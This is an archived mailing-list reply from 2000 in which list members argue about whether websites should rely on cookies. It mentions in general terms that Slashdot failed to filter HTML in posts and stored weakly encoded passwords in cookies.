hi,
actually in order for this flaw to work one must have both enabled
on the browser.. was just giving people a heads up since the topic
was cookies.. and no IMHO cookies are not required to obtain good
info..
On Mon, 24 Apr 2000, Matt Sergeant wrote:
> On Mon, 24 Apr 2000, Marc Slemko wrote:
>
> > Don't go holding slashdot up as a great example. They is a perfect
> > example of what not to do. Last I checked, and this is probably still
> > true, anyone could make a post that, when read, stole the password of the
> > user reading it if they were logged in at the time.
> >
> > slashdot does everything wrong. They allow user posts to be read by
> > others without properly filtering or encoding HTML. They use a cookie
> > that is simply the user's user id and password, very trivially encoded.
> > etc.
>
> Hold yer guns there cowboy! I wasn't saying /. is a great example, just
> that a lot of clueful people use that site (or did?), and it has always
> used cookies. To say that the majority of clueful users turn off cookies
> is just wrong. If anything, clueful users install a junkbuster or
> equivalent and let cookies through for sites they want to use them for.
>
> > But, for certain applications, there simply aren't any alternatives that
> > don't have more significant problems. You definitely do have to be very
> > careful when desigining your use of cookies so you understand what the
> > risks are and properly minimize them, but just because there are a couple
> > of browser security bugs (and lots have been found in the past, and lots
> > will be found and/or announced in the future) doesn't mean any huge
> > percentage of users have cookies disabled or that you shouldn't use
> > cookies at all.
>
> I'm not aware of any serious cookie security bugs - maybe I missed
> them. All the ones I can recall were Javascript ones. I still leave
> Javascript on though - but I don't visit a whole lot of sites that would
> be malicous.
>
> --
> <Matt/>
>
> Fastnet Software Ltd. High Performance Web Specialists
> Providing mod_perl, XML, Sybase and Oracle solutions
> Email for training and consultancy availability.
> http://sergeant.org http://xml.sergeant.org
--
_______________________________________________________________________
************** DREAMWVR.COM - TOTAL INTERNET SERVICES ****************
TOTAL DESIGN - DEVELOPMENT - INTEGRATION - SECURITY - Click Here..
<http://www.dreamwvr.com/services/MAX_SEC.html>
DREAMWVR.COM - The Console of Many... 90 Topics Covered
<http://www.dreamwvr.com/dynamicduo.html> <mailto:[EMAIL PROTECTED]>
->> LINUX-MANDRAKE Solution Provider and North American Distributor <<-
PRODUCT OF THE YEAR!
<http://www.dreamwvr.com/mandrake/mandrake-main.html>
"===0 PGP Key Available
*************** "As Unique as the Company You Keep." *****************
"If anyone speaks from DREAMWVR.COM its certainly not me:-)"
________________________________________________________________________
